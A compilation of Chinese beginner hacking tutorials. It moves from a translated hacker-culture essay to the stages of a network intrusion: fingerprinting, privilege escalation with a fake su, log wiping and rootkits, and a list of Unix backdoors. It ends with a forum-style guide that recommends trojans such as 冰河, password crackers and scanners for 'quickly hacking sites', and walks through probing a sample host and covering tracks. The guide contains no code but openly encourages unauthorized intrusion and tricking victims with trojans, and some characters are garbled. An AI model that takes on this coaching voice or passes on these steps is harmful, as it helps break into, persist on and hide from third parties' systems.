最全面的菜鳥到高手的過程 菜鳥黑客基礎教學

1、黑客的精神態度是很重要的,但技術則更是重要。黑客的態度雖然是無可取代,隨著新科技的發明和舊技術的取代,這些工具隨時間在慢慢的改變。例如:以往總是會學會用機器碼寫程序,直到最近我們開始使用HTML。不過,在1996年末,當然,這是基礎的hacking技能。在1997年,理所當然的,你必須學會C。 但,如果你只是學一種語言,那麼你不能算是一位黑客,了不起只能算是一個programmer。除此,你還必須學會學會以獨立於任何程序語言之上的概括性觀念來思考一件程序設計上的問題。要成為一位真正的黑客,你必須要能在幾天之內將manual內容和你目前己經知道的關連起學會一種新的語言。也就是說,你必會學還了C之外的東西,你至少還要會LISP或Perl(Java也正在努力的擠上這個名單; 譯者注: 我很懷疑這份名單)。除了幾個重要的hacking常用語言之外,這些語言提供你一些不同的程序設計途徑,並且讓你在好的方法中學習。 程序設計是一種複雜的技術,我沒辨法在這提供完整的學習步驟。但是我能告訴你一些在書本上和課堂上所沒有的東西(有很多,幾乎全部最好的黑客們都是自習而來的)。(a) 讀別人的程序碼;(寫程序,這兩項是不錯的方法。學習寫程序就像在學習寫一種良好的自然語言,最好的方法是去看一些專家們所寫的東西,然後寫一些你自己的東西,然後讀更多,再寫更多。然後一直持續,一直到你發展出一種屬於自己的風格和特色。要找到好的程序碼來看是很一件很困難的事,因為,對菜鳥黑客們而言,適於供他們閱讀和努力的大型程序的source數量很少。但這事己有了戲劇性的變化了; 現在免費的供應的軟件、程序設計工具和操作系統(大都公開提供 source,而且全都是由黑客們寫成的)到處可看。進入下一個主題。 2、取得一個免費的 UNIX,並學習使用和維護。我先假設你己經有一部個人電腦或者是可以使用任何一部(現在的小孩子真幸福,可如此輕易的擁有 :-))。 取得黑客技巧的第一個步驟是取得一份Linux 或者一份免費的 BSD-Unix,並將它安裝在自己的機器,並使之順利的運作。沒錯,在這個世界上除了Unix之外,還有其它的操作系統。但是他們只提供bianry,你不能看到他們的程序碼,你也不能修改他們。想要在DOS或Windows或MacOS開始hacking,無疑就是要你綁著枷鎖跳舞一樣。 除此之外,Unix是Internet上的操作系統。當你在不懂Unix的情況下學習使用Internet時,你沒辨法在不懂Unix的情況下成為Internet的黑客。因為這個原故,現在的黑客文化還是很牢固的以Unix為中心。(這並不完全是正確的,而且有些活在舊時代的黑客甚至也不喜歡這種情形,但是Unix和Internet之間的共生共成己經到了牢不可破的地步,即使是Microsoft的大塊肌肉也沒能在上面留下明顯的傷痕。) 因些,把Unix裝起來吧! (我自己是喜歡Linux,但是還有其它的東東可用。) 學習它,讓它運作起來,讓它陪你努力精進。 用他向整個Internet喊話。看程序碼,改程序。 有一天你成為一位高竿的黑客,你回頭往後看時會發現,你得到比Microsoft操作系統所能提供的還要好的程序設計工具(包括 C,Lisp和 Perl)。而且得到快樂,並學到比比你想像中的還要多的知識。關於學習Unix,在Loginataka有更多的資料。(


http://www.ccil.org/~esr/faqs/loginataka。) 看一下Linux distribution的目錄或 Linux CD,並把自己交付給它。 3、學習使用World Wide Web並學會寫 HTML。 在黑客文化創造出來的東西,大多在他們的活動範圍外被使用著,如,在工廠和辨公室或大學被漠漠的使用著。但Web是一個很大的例外,這個黑客眼中的大玩具甚至還被政客們接受,並巧巧的在改變這個世界。因此(還有很多好的理由),你必須學習Web。並不只是學習使用browser(這太容易了)而己,還要學會寫HTML這個Web的標籤語言。如果你不知道如何設計程序,寫HTML也可以給一些習慣上的幫助。嗯!! 建立home page吧! 不過,有一個home page 並沒任何特別之處能讓你成為一位黑客。Web上到處都是home page,而且大部份都沒什麼重點,沒什麼內容的爛泥 -- 很好看的爛泥巴,但是看起來都一樣,差不多。 4、至少學會以下的其中兩種: 一、網站服務器程序ASP、PHP、CGI、jsP 我個人認為CGI是最難學的其中一種。 二、程序語言:C語言、C++、VB、JAVA、PERL、DELPHI、彙編語言 不過我認為C語言的通用性最好,可以跨平臺(操作系統)使用。 還要試著自己寫程序、開發軟件等工作。 三、數據庫管理軟件:MYSQL、SQL、FOXPRO……等。 四、幾種常用的操作系統:WIN98、WIN2000、WINNT、WINXP、UNIX、LINUX、要是能學到UNIX那是最好不過的了。最最基本的WIN2K、WINNT也要學會吧。 如果以上的你都會了,那麼你已經是個高手了。 黑客初級技術講解(上) 網絡安全從其本質上來講就是網絡上的信息安全。從廣義來說,凡是涉及到網絡上信息的保密性、完整性、可用性、真實性和可控性的相關技術和理論都是網絡安全的研究領域。確保網絡系統的信息安全是網絡安全的目標,信息安全包括兩個方面:信息的存 儲安全和信息的傳輸安全。信息的存儲安全是指信息在靜態存放狀態下的安全,如是否會被非授權調用等。信息的傳輸安全是指信息在動態傳輸過程中安全。為了確保網絡信息的傳輸安全,有以下幾個問題:   (1)對網絡上信息的監聽   (2)對用戶身份的仿冒   (3)對網絡上信息的篡改   (4)對發出的信息予以否認   (5)對信息進行重發   對於一般的常用入侵方法主要有   1.口令入侵   所謂口令入侵,就是指用一些軟件解開已經得到但被人加密的口令文檔,不過許多黑客已大量採用一種可以繞開或屏蔽口令保護的程序來完成這項工作。對於那些可以解開或屏蔽口令保護的程序通常被稱為"Crack"。由於這些軟件的廣為流傳,使得入侵電腦網絡系統有時變得相當簡單,一般不需要很深入瞭解系統的內部結構,是初學者的好方法。   2.特洛伊木馬術   說到特洛伊木馬,只要知道這個故事的人就不難理解,它最典型的做法可能就是把一個能幫助黑客完成某一特定動作的程序依附在某一合法用戶的正常程序中,這時合法用戶的程序代碼已被該變。一旦用戶觸發該程序,那麼依附在內的黑客指令代碼同時被激活,這些代碼往往能完成黑客指定的任務。由於這種入侵法需要黑客有很好的編程經驗,且要更改代碼、要一定的權限,所以較難掌握。但正因為它的複雜性,一般的系統管理員很難發現。   3.監聽法   這是一個很實用但風險也很大的黑客入侵方法,但還是有很多入侵系統的黑客採用此類方法,正所謂藝高人膽大。   網絡節點或工作站之間的交流是通過信息流的轉送得以實現,而當在一個沒有集線器的網絡中,數據的傳輸並沒有指明特定的方向,這時每一個網絡節點或工作站都是一個接口。這就好比某一節點說:"嗨!你們中有誰是我要發信息的工作站。"   此時,所有的系統接口都收到了這個信息,一旦某個工作站說:"嗨!那是我,請把數據傳過來。"聯接就馬上完成。   目前有網絡上流傳著很多嗅探軟件,利用這些軟件就可以很簡單的監聽到數據,甚至就包含口令文件,有的服務在傳輸文件中直接使用明文傳輸,這也是非常危險的 4.E-mail技術   使用email加木馬程序這是黑客經常使用的一種手段,而且非常奏效,一般的用戶,甚至是網管,對網絡安全的意識太過於淡薄,這就給很多黑客以可乘之機。   5.病毒技術   作為一個黑客,如此使用應該是一件可恥的事情,不過大家可以學習,畢竟也是一種攻擊的辦法,特殊時間,特殊地點完全可以使用。   6.隱藏技術   網絡攻擊的一般步驟及實例   攻擊的準備階段   首先需要說明的是,入侵者的來源有兩種,一種是內部人員利用自己的工作機會和權限來獲取不應該獲取的權限而進行的攻擊。另一種是外部人員入侵,包括遠程入侵、網絡節點接入入侵等。本節主要討論遠程攻擊。   進行網絡攻擊是一件系統性很強的工作,其主要工作流程是:收集情報,遠程攻擊,遠程登錄,取得普通用戶的權限,取得超級用戶的權限,留下後門,清除日誌。主要內容包括目標分析,文檔獲取,破解密碼,日誌清除等技術,下面分別介紹。   1.確定攻擊的目的   攻擊者在進行一次完整的攻擊之前首先要確定攻擊要達到什麼樣的目的,即給對方造成什麼樣的後果。常見的攻擊目的有破壞型和入侵型兩種。破壞型攻擊指的只是破壞攻擊目標,使其不能正常工作,而不能隨意控制目標的系統的運行。要達到破壞型攻擊的目的,主要的手段是拒絕服務攻擊(Denial Of Service)。另一類常見的攻擊目的是入侵攻擊目標,這種攻擊是要獲得一定的權限來達到控制攻擊目標的目的。應該說這種攻擊比破壞型攻擊更為普遍,威脅性也更大。因為黑客一旦獲取攻擊目標的管理員權限就可以對此服務器做任意動作,包括破壞性的攻擊。此類攻擊一般也是利用服務器操作系統、應用軟件或者網絡協議存在的漏洞進行的。當然還有另一種造成此種攻擊的原因就是密碼洩露,攻擊者靠猜測或者窮舉法來得到服務器用戶的密碼,然後就可以用和真正的管理員一樣對服務器進行訪問。   2.信息收集   除了確定攻擊目的之外,攻擊前的最主要工作就是收集儘量多的關於攻擊目標的信息。這些信息主要包括目標的操作系統類型及版本,目標提供哪些服務,各服務器程序的類型與版本以及相關的社會信息。   要攻擊一臺機器,首先要確定它上面正在運行的操作系統是什麼,因為對於不同類型的操作系統,其上的系統漏洞有很大區別,所以攻擊的方法也完全不同,甚至同一種操作系統的不同版本的系統漏洞也是不一樣的。要確定一臺服務器的操作系統一般是靠經驗,有些服務器的某些服務顯示信息會洩露其操作系統。例如當我們通過TELNET連上一臺機器時,如果顯示   Unix(r)System V Release 4.0   login:   那麼根據經驗就可以確定這個機器上運行的操作系統為SUN OS 5.5或5.5.l。但這樣確定操作系統類型是不準確的,因為有些網站管理員為了迷惑攻擊者會故意更改顯示信息,造成假象。 還有一種不是很有效的方法,諸如查詢DNS的主機信息(不是很可靠)來看登記域名時的申請機器類型和操作系統類型,或者使用社會工程學的方法來獲得,以及利用某些主機開放的SNMP的公共組來查詢。   另外一種相對比較準確的方法是利用網絡操作系統裡的TCP/IP堆棧作為特殊的"指紋"來確定系統的真正身份。因為不同的操作系統在網絡底層協議的各種實現細節上略有不同。可以通過遠程向目標發送特殊的包,然後通過返回的包來確定操作系統類型。例如通過向目標機發送一個FIN的包(或者是任何沒有ACK或SYN標記的包)到目標主機的一個開放的端口然後等待回應。許多系統如windows、 BSDI、 CISCO、 HP/UX和 IRIX會返回一個RESET。通過發送一個SYN包,它含有沒有定義的TCP標記的TCP頭。那麼在Linux系統的回應包就會包含這個沒有定義的標記,而在一些別的系統則會在收到SYN+BOGU包之後關閉連接。或是利用尋找初始化序列長度模板與特定的操作系統相匹配的方法。利用它可以對許多系統分類,如較早的Unix系統是64K長度,一些新的Unix系統的長度則是隨機增長。還有就是檢查返回包裡包含的窗口長度,這項技術根據各個操作系統的不同的初始化窗口大小來唯一確定它們。利用這種技術實現的工具很多,比較著名的有NMAP、CHECKOS、QUESO等。   獲知目標提供哪些服務及各服務daemon的類型、版本同樣非常重要,因為已知的漏洞一般都是對某一服務的。這裡說的提供服務就是指通常我們提到的喘口,例如一般TELNET在23端口,FTP在對21端口,WWW在80端口或8080端口,這只是一般情況,網站管理完全可以按自己的意願修改服務所監聽的端口號。在不同服務器上提供同一種服務的軟件也可以是不同,我們管這種軟件叫做daemon,例如同樣是提供FTP服務,可以使用wuftp、proftp,ncftp等許多不同種類的daemon。確定daemon的類型版本也有助於黑客利用系統漏洞攻破網站。   另外需要獲得的關於系統的信息就是一些與計算機本身沒有關係的社會信息,例如網站所屬公司的名稱、規模,網絡管理員的生活習慣、電話號碼等。這些信息看起來與攻擊一個網站沒有關係,實際上很多黑客都是利用了這類信息攻破網站的。例如有些網站管理員用自己的電話號碼做系統密碼,如果掌握了該電話號碼,就等於掌握了管理員權限進行信息收集可以用手工進行,也可以利用工具來完成,完成信息收集的工具叫做掃描器。用掃描器收集信息的優點是速度快,可以一次對多個目標進行掃描。   攻擊的實施階段   1.獲得權限   當收集到足夠的信息之後,攻擊者就要開始實施攻擊行動了。作為破壞性攻擊,只需利用工具發動攻擊即可。而作為入侵性攻擊,往往要利用收集到的信息,找到其系統漏洞,然後利用該漏洞獲取一定的權限。有時獲得了一般用戶的權限就足以達到修改主頁等目的了,但作為一次完整的攻擊是要獲得系統最高權限的,這不僅是為了達到一定的目的,更重要的是證明攻擊者的能力,這也符合黑客的追求。   能夠被攻擊者所利用的漏洞不僅包括系統軟件設計上的安全漏洞,也包括由於管理配置不當而造成的漏洞。前不久,因特網上應用最普及的著名www服務器提供商Apache的主頁被黑客攻破,其主頁面上的 Powered by Apache圖樣(羽毛狀的圖畫)被改成了Powered by Microsoft Backoffice的圖樣,那個攻擊者就是利用了管理員對Webserver用數據庫的一些不當配置而成功取得最高權限的。 黑客初級技術講解(中)   當然大多數攻擊成功的範例還是利用了系統軟件本身的漏洞。造成軟件漏洞的主要原因在於編制該軟件的程序員缺乏安全意識。當攻擊者對軟件進行非正常的調用請求時造成緩衝區溢出或者對文件的非法訪問。其中利用緩衝區溢出進行的攻擊最為普遍,據統計80%以上成功的攻擊都是利用了緩衝區溢出漏洞來獲得非法權限的。關於緩衝區溢出在後面用專門章節來作詳細解釋。   無論作為一個黑客還是一個網絡管理員,都需要掌握儘量多的系統漏洞。黑客需要用它來完成攻擊,而管理員需要根據不同的漏洞來進行不同的防禦措施。瞭解最新最多的漏洞信息,可以到諸如Rootshell(www.rootshell.com)、Packetstorm(packetstorm.securify.com)、Securityfocus(www.securityfocus.com)等網站去查找。   2.權限的擴大   系統漏洞分為遠程漏洞和本地漏洞兩種,遠程漏洞是指黑客可以在別的機器上直接利用該漏洞進行攻擊並獲取一定的權限。這種漏洞的威脅性相當大,黑客的攻擊一般都是從遠程漏洞開始的。但是利用遠程漏洞獲取的不一定是最高權限,而往往只是一個普通用戶的權限,這樣常常沒有辦法做黑客們想要做的事。這時就需要配合本地漏洞來把獲得的權限進行擴大,常常是擴大至系統的管理員權限。 只有獲得了最高的管理員權限之後,才可以做諸如網絡監聽、打掃痕跡之類的事情。要完成權限的擴大,不但可以利用已獲得的權限在系統上執行利用本地漏洞的程序,還可以放一些木馬之類的欺騙程序來套取管理員密碼,這種木馬是放在本地套取最高權限用的,而不能進行遠程控制。例如一個黑客已經在一臺機器上獲得了一個普通用戶的賬號和登錄權限,那麼他就可以在這臺機器上放置一個假的su程序。一旦黑客放置了假su程序,當真正的合法用戶登錄時,運行了su,並輸入了密碼,這時root密碼就會被記錄下來,下次黑客再登錄時就可以使用su變成root了。   攻擊的善後工作   1.日誌系統簡介   如果攻擊者完成攻擊後就立刻離開系統而不做任何善後工作,那麼他的行蹤將很快被系統管理員發現,因為所有的網絡操作系統一般都提供日誌記錄功能,會把系統上發生的動作記錄下來。所以,為了自身的隱蔽性,黑客一般都會抹掉自己在日誌中留下的痕跡。想要了解黑客抹掉痕跡的方法,首先要了解常見的操作系統的日誌結構以及工作方式。Unix的日誌文件通常放在下面這幾個位置,根據操作系統的不同略有變化   /usr/adm——早期版本的Unix。   /Var/adm新一點的版本使用這個位置。   /Varflort一些版本的Solaris、 Linux BSD、 Free BSD使用這個位置。   /etc,大多數Unix版本把Utmp放在此處,一些Unix版本也把Wtmp放在這裡,這也是Syslog.conf的位置。   下面的文件可能會根據你所在的目錄不同而不同:   acct或pacct-一記錄每個用戶使用的命令記錄。   accesslog主要用來服務器運行了NCSA HTTP服務器,這個記錄文件會記錄有什麼站點連接過你的服務器。   aculo保存撥出去的Modems記錄。   lastlog記錄了最近的Login記錄和每個用戶的最初目的地,有時是最後不成功Login的記錄。   loginlog一記錄一些不正常的L0gin記錄。   messages——記錄輸出到系統控制檯的記錄,另外的信息由Syslog來生成   security記錄一些使用 UUCP系統企圖進入限制範圍的事例。   sulog記錄使用su命令的記錄。   utmp記錄當前登錄到系統中的所有用戶,這個文件伴隨著用戶進入和離開系統而不斷變化。   Utmpx,utmp的擴展。   wtmp記錄用戶登錄和退出事件。   Syslog最重要的日誌文件,使用syslogd守護程序來獲得。   2.隱藏蹤跡   攻擊者在獲得系統最高管理員權限之後就可以隨意修改系統上的文件了(只對常規 Unix系統而言),包括日誌文件,所以一般黑客想要隱藏自己的蹤跡的話,就會對日誌進行修改。最簡單的方法當然就是刪除日誌文件了,但這樣做雖然避免了系統管理員根據IP追蹤到自己,但也明確無誤地告訴了管理員,系統己經被人侵了。所以最常用的辦法是隻對日誌文件中有關自己的那一部分做修改。關於修改方法的具體細節根據不同的操作系統有所區別,網絡上有許多此類功能的程序,例如 zap、 wipe等,其主要做法就是清除 utmp、wtmp、Lastlog和 Pacct等日誌文件中某一用戶的信息,使得當使用w、who、last等命令查看日誌文件時,隱藏掉此用戶的信息。 管理員想要避免日誌系統被黑客修改,應該採取一定的措施,例如用打印機實時記錄網絡日誌信息。但這樣做也有弊端,黑客一旦瞭解到你的做法就會不停地向日志裡寫入無用的信息,使得打印機不停地打印日誌,直到所有的紙用光為止。所以比較好的避免日誌被修改的辦法是把所有日誌文件發送到一臺比較安全的主機上,即使用loghost。即使是這樣也不能完全避免日誌被修改的可能性,因為黑客既然能攻入這臺主機,也很可能攻入loghost。   只修改日誌是不夠的,因為百密必有一漏,即使自認為修改了所有的日誌,仍然會留下一些蛛絲馬跡的。例如安裝了某些後門程序,運行後也可能被管理員發現。所以,黑客高手可以通過替換一些系統程序的方法來進一步隱藏蹤跡。這種用來替換正常系統程序的黑客程序叫做rootkit,這類程序在一些黑客網站可以找到,比較常見的有LinuxRootKit,現在已經發展到了5.0版本了。它可以替換系統的ls、ps、netstat、inetd等等一系列重要的系統程序,當替換了ls後,就可以隱藏指定的文件,使得管理員在使用ls命令時無法看到這些文件,從而達到隱藏自己的目的。   3.後門    一般黑客都會在攻入系統後不只一次地進入該系統。為了下次再進入系統時方便一點,黑客會留下一個後門,特洛伊木馬就是後門的最好範例。Unix中留後門的方法有很多種,下面介紹幾種常見的後門,供網絡管理員參考防範。   
<1>密碼破解後門   這是入侵者使用的最早也是最老的方法,它不僅可以獲得對Unix機器的訪問,而且可 以通過破解密碼製造後門。這就是破解口令薄弱的帳號。以後即使管理員封了入侵者的當前帳號,這些新的帳號仍然可能是重新侵入的後門。多數情況下,入侵者尋找口令薄弱的未使用帳號,然後將口令改的難些。當管理員尋找口令薄弱的帳號是,也不會發現這些密碼已修改的帳號。因而管理員很難確定查封哪個帳號。   <2>Rhosts + + 後門   在連網的Unix機器中,象Rsh和Rlogin這樣的服務是基於rhosts文件裡的主機名使用簡 單的認證方法。用戶可以輕易的改變設置而不需口令就能進入。 入侵者只要向可以訪問的某用戶的rhosts文件中輸入"+ +",就可以允許任何人從任何地方無須口令便能進 入這個帳號。特別當home目錄通過NFS向外共享時,入侵者更熱中於此。這些帳號也成 了入侵者再次侵入的後門。許多人更喜歡使用Rsh,因為它通常缺少日誌能力. 許多管理員經常檢查 "+ +",所以入侵者實際上多設置來自網上的另一個帳號的主機名和 用戶名,從而不易被發現。   <3>校驗和及時間戳後門   早期,許多入侵者用自己的trojan程序替代二進制文件。系統管理員便依靠時間戳和系 統校驗和的程序辨別一個二進制文件是否已被改變,如Unix裡的sum程序。入侵者又發展了使trojan文件和原文件時間戳同步的新技術。它是這樣實現的: 先將系統時鐘撥 回到原文件時間,然後調整trojan文件的時間為系統時間。一旦二進制trojan文件與 原來的精確同步,就可以把系統時間設回當前時間。Sum程序是基於CRC校驗,很容易 騙過。入侵者設計出了可以將trojan的校驗和調整到原文件的校驗和的程序。MD5是被 大多數人推薦的,MD5使用的算法目前還沒人能騙過。
<4>Login後門   在Unix裡,login程序通常用來對telnet來的用戶進行口令驗證. 入侵者獲取login.c的 原代碼並修改,使它在比較輸入口令與存儲口令時先檢查後門口令。如果用戶敲入後門 口令,它將忽視管理員設置的口令讓你長驅直入。這將允許入侵者進入任何帳號,甚至 是root。由於後門口令是在用戶真實登錄並被日誌記錄到utmp和wtmp前產生一個訪問 的,所以入侵者可以登錄獲取shell卻不會暴露該帳號。管理員注意到這種後門後,便 用"strings"命令搜索login程序以尋找文本信息. 許多情況下後門口令會原形畢露。入侵者就開始加密或者更好的隱藏口令,使strings命令失效<5>Telnetd後門   當用戶telnet到系統,監聽端口的inetd服務接受連接隨後遞給in.telnetd,由它運行 login.一些入侵者知道管理員會檢查login是否被修改,就著手修改in.telnetd. 在in.telnetd內部有一些對用戶信息的檢驗,比如用戶使用了何種終端. 典型的終端 設置是Xterm或者VT100.入侵者可以做這樣的後門,當終端設置為"letmein"時產生一 個不要任何驗證的shell. 入侵者已對某些服務作了後門,對來自特定源端口的連接產 生一個shell。   <6>服務後門   幾乎所有網絡服務曾被入侵者作過後門. Finger,rsh,rexec,rlogin,ftp,甚至 inetd等等的作了的版本隨處多是。有的只是連接到某個TCP端口的shell,通過後門口令就能獲取訪問。這些程序有時用刺媧□?Ucp這樣不用的服務,或者被加入inetd.conf 作為一個新的服務,管理員應該非常注意那些服務正在運行,並用MD5對原服務程序做校驗。   
<7>Cronjob後門   Unix上的Cronjob可以按時間表調度特定程序的運行。入侵者可以加入後門shell程序 使它在1AM到2AM之間運行,那麼每晚有一個小時可以獲得訪問。也可以查看cronjob中 經常運行的合法程序,同時置入後門。   <8>庫後門   幾乎所有的UNIX系統使用共享庫,共享庫用於相同函數的重用而減少代碼長度。一些入侵者在象crypt.c和_crypt.c這些函數里作了後門;象login.c這樣的程序調用了 crypt()。當使用後門口令時產生一個shell。 因此,即使管理員用MD5檢查login程序,仍然能產生一個後門函數,而且許多管理員並不會檢查庫是否被做了後門。對於許多入侵者來說有一個問題: 一些管理員對所有東西多作了MD5校驗,有一種辦法是入侵者對open()和文件訪問函數做後門。後門函數讀原文件但執行trojan後門程序。所以 當MD5讀這些文件時,校驗和一切正常,但當系統運行時將執行trojan版本的,即使trojan庫本身也可躲過MD5校驗,對於管理員來說有一種方法可以找到後門,就是靜態編連MD5校驗程序然後運行,靜態連接程序不會使用trojan共享庫。   <9>內核後門   內核是Unix工作的核心,用於庫躲過MD5校驗的方法同樣適用於內核級別,甚至連靜態 連接多不能識別. 一個後門作的很好的內核是最難被管理員查找的,所幸的是內核的 後門程序還不是隨手可得,每人知道它事實上傳播有多廣。  <10>文件系統後門   入侵者需要在服務器上存儲他們的掠奪品或數據,並不能被管理員發現,入侵者的文章常是包括exploit腳本工具,後門集,sniffer日誌,email的備分,原代碼,等等!有時為了防止管理員發現這麼大的文件,入侵者需要修補"ls","du","fsck"以隱匿特定的目錄和文件,在很低的級別,入侵者做這樣的漏洞: 以專有的格式在硬盤上割出一部分,且表示為壞的扇區。因此入侵者只能用特別的工具訪問這些隱藏的文件,對於普通的管理員來說,很難發現這些"壞扇區"裡的文件系統,而它又確實存在。   
<11>Boot塊後門   在PC世界裡,許多病毒藏匿與根區,而殺病毒軟件就是檢查根區是否被改變。Unix下,多數管理員沒有檢查根區的軟件,所以一些入侵者將一些後門留在根區。 . 所以更多的管理員是 用MD5校驗和檢測這種後門的。 <12>隱匿進程後門   入侵者通常想隱匿他們運行的程序,這樣的程序一般是口令破解程序和監聽程序 (sniffer),有許多辦法可以實現,這裡是較通用的: 編寫程序時修改自己的argv[] 使它看起來象其他進程名。可以將sniffer程序改名類似in.syslog再執行,因此 當管理員用"ps"檢查運行進程時,出現 的是標準服務名。可以修改庫函數致使 "ps"不能顯示所有進程,可以將一個後門或程序嵌入中斷驅動程序使它不會在進程表顯現。使用這個技術的一個後門例子是   amod.tar.gz :   
http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html網絡通行. 這些網絡通行後 門有時允許入侵者通過防火牆進行訪問。有許多網絡後門程序允許入侵者建立某個端 口號並不用通過普通服務就能實現訪問. 因為這是通過非標準網絡端口的通行,管理 員可能忽視入侵者的足跡. 這種後門通常使用TCP,UDP和ICMP,但也可能是其他類型報文。   <14>TCP Shell 後門   入侵者可能在防火牆沒有阻塞的高位TCP端口建立這些TCP Shell後門. 許多情況下,他 們用口令進行保護以免管理員連接上後立即看到是shell訪問. 管理員可以用netstat 命令查看當前的連接狀態,那些端口在偵聽,目前連接的來龍去脈. 通常這些後門可 以讓入侵者躲過TCP Wrapper技術. 這些後門可以放在SMTP端口,許多防火牆允許 e-mail通行的.   
<15>UDP Shell 後門   管理員經常注意TCP連接並觀察其怪異情況,而UDP Shell後門沒有這樣的連接,所以 netstat不能顯示入侵者的訪問痕跡,許多防火牆設置成允許類似DNS的UDP報文的通行,通常入侵者將UDP Shell放置在這個端口,允許穿越防火牆。   <16>ICMP Shell 後門   Ping是通過發送和接受ICMP包檢測機器活動狀態的通用辦法之一。許多防火牆允許外界ping它內部的機器,入侵者可以放數據入Ping的ICMP包,在ping的機器間形成一個shell通道,管理員也許會注意到Ping包暴風,但除了他查看包內數據,否者入侵者不會暴露。   <17>加密連接   管理員可能建立一個sniffer試圖某個訪問的數據,但當入侵者給網絡通行後門加密 後,就不可能被判定兩臺機器間的傳輸內容了 基礎知識(1) 我認為這是一套適合初學者由淺到深的文章,所以強烈推薦給大家,作者從基礎講到最近比較火的漏洞,可能有些人看來是淺了些,但是的確很適合想幹點啥但又不知道怎麼辦的菜鳥們 。 第一節,伸展運動。這節操我們要準備道具,俗話說:"工欲善其事,必先利其器"(是這樣嗎?哎!文化低……)說得有道理,我們要學習黑客技術,一點必要的工具必不可少。 1,一臺屬於自己的可以上網的電腦。這樣你可以有充分的支配權,上網不用說,否則你怎麼看到我的文章?wap?呵呵!屬於自己很重要,否則安全性是個很大的問題。第一點相信大家沒有問題。 2,windows2000/nt,別和我說98/me,他們是你們同學用來玩遊戲的!(當然,我也是鐵桿game fan)對網絡支持極差,命令受限制,很多軟件又不能用,對黑客來說使用起來絆手絆腳,非常不利。這裡我推薦2000,這是一個很成熟的系統(漏洞還是有一堆)。推薦雙系統,這樣黑玩搭配,幹活不累。 3,冰河。中國第一木馬,中者數不勝數,國人驕傲。雖然用冰河根本不能算黑客,但它確實能培養你對黑客的興趣,同時幫助你瞭解網絡,相信很多黑客同學都是這樣起步的。靜止寫的那篇冰河教程很不錯,大家仔細看看。而且,以後你學會入侵服務器後,用冰河操作也會減少工作量(我是懶蟲,爽!) 4,oicq。我們學黑客,可不是學泡mm!bfctx你………… 息怒息怒!我們當然是學黑客,但不要忘了,眾人拾柴火更高,我們通過cshu的成員列表,互相聯繫幫助,對提高水平很有幫助!另外我要廢話一句:據我瞭解,現在黑客網站下載最多的都是針對oicq的破解工具,我個人認為很無聊,偷個密碼代表什麼,浪費時間!最後補充:mm不能不泡。(誰砸我??!!) 5,superscan。很好用的端口掃描器,速度超快,功能一流,一旦擁有,別無所求……(打住!)不論是找木馬受害者,還是掃服務器端口,它都非常有效,cshu強烈推薦! 6,一本筆記本/便條,網上資料相當多,黑客處理的也是非常之多。良好的習慣決定了你的效率,準備一本筆記本,記錄下你的成果,肉雞,木馬利用,命令,密碼……堅持一下,你會發現你的效率大幅上升的! 7,lc3.著名nt/2000sam破解程序,有時我們拿不到足夠權限,又沒好辦法,那麼lc3是最好的解決辦法,只要你拿的到sam,你就是服務器它爺爺!本站有其破解程序,支持了暴力破解! 8,程序合併。這是玩木馬必需的,雖然木馬是很低的手段,但有時配合巧辦法(以後我會介紹)確實能夠達到意想不到的效果,朋友們可以在空閒時玩玩木馬,很有趣,若你能巧妙的騙過mm,那麼webmaster也可能被你騙倒:〉 (比較理想化) 9,流光4for 2000/nt。可能是世界上最好的綜合類黑軟!中國的驕傲,它集成了很全的漏洞信息,速度快,方法多,對有漏洞的主機是毀滅性的打擊,操作又方便,是快速黑站必不可少的精品工具。超級吐血推薦!! 10,良好的心態,穩定的情緒,刻苦鑽研的精神,刨根問底的作風,打掃房間的習慣。黑客是門很高深的學問,不要幻想一步登天,失敗是常有的事,千萬不可灰心。在那麼多黑軟的包圍下,切不可完全依賴他們,一定要了解它們利用什麼原理工作。對任何一個小問題,小細節,一定要問清楚,cshu就是給大家互相交流的場所哦!黑完後不要得意忘形,打掃戰場也很重要,以防萬一。 第一節操完,可能很無聊,我就這點水平,大家見諒!這裡我說一句大話:做完菜鳥操,包你會黑簡單的站(哎喲!心慌了!) 下一節操我們要介紹如何掌握一臺主機的基本信息,期待中…… 真是太對不起大家了,隔了那麼久才寫這篇教程,我這幾天實在太忙,大家還是體諒一下我吧,好了,開始做操。 今天的內容是獲得主機的信息。 我們要黑一臺主機,首先要了解它的信息,包括它的類型,用戶列表,目錄,端口,漏洞等等。 首先我們我們要找一臺主機來練手,隨便挑吧!www.flyingfish.com(亂說的) 第一部,呵呵,先在ie裡看看吧,mmmm.....做的還行,挺精緻的!主要是我們肯定了它現在是正常的。 然後,我們應該知道它的ip,很簡單,ping它一下就可以了。 ping www.flyingfish.com,看看窗口裡有了什麼?是不是有三行回應,其中的111.111.222.222就是ip了(還是胡說的,一個例子)。有人是不是要問,我這裡怎麼沒有。那可能是兩個原因,第一,你打錯命令了;第二,該主機裝了防火牆,禁止ping,不過這種可能很小。 知道了ip,下一步應該確定端口了。下面是一些常用的端口的默認值 21--ftp 重要哦 23--telnet 歡呼吧 25-smtp 儘管重要,但似乎沒什麼可利用的 53--domain 同上 79--finger 可知道用戶信息了 80--http 要看網頁,沒它不行吧 110--pop 收信的 139--netbios 共享用的,很有利用價值哦 3389--win2000超級終端 呵呵,這個好! 其實端口有上千種,這些最最常用 我們怎麼知道服務器有什麼端口打開呢??去找個掃描器吧,x-scan ,super scan,flux等等很多哦。這裡我推薦super scan ,速度很快,本站也有其教程哦!用法還是比較傻瓜的,估計大家不會有問題,輕輕幾點,打開的端口就出現了。不錯不錯,上面說到的都有(太理想化了吧!) 那麼我們該如何應對呢? ps:忘了說一聲,順便掃一下7626,冰河有也說不準哦:) 若有ftp,那就用用匿名登陸。自己動手也行,最好用x-scan flux等吧!反正,有ftp就有一份希望 telnet在!好!telnet 111.111.222.222,出現窗口了吧!嗯?要密碼?看來網管還不是超級注意文明用語:)隨便猜個,錯了,閃人! smtp,看著它,無奈 domain,一般它帶了局域網了 finger 可以知道用戶列表了,不好,忘了用法了,幸好finger很少出現 80肯定在,我們等會來對付它 110 有smtp,pop在也不奇怪了 139 找個掃描器來找找有沒有露在外面的共享吧,日後也用得著 3389 太太太好了!!打開客戶端吧,用輸入法漏洞試試,成了就幹了它!不成也沒事,我們以後完全控制它3389會很方便的。 端口掃完了!我們在多瞭解它一點吧!追捕大家都知道吧,其實用它獲取主機信息也不賴哦。打開追捕,輸入ip,選擇智能追捕,是不是有很多信息出來了?雖然不能直接利用,但畢竟我們有對它有了進一步的瞭解。 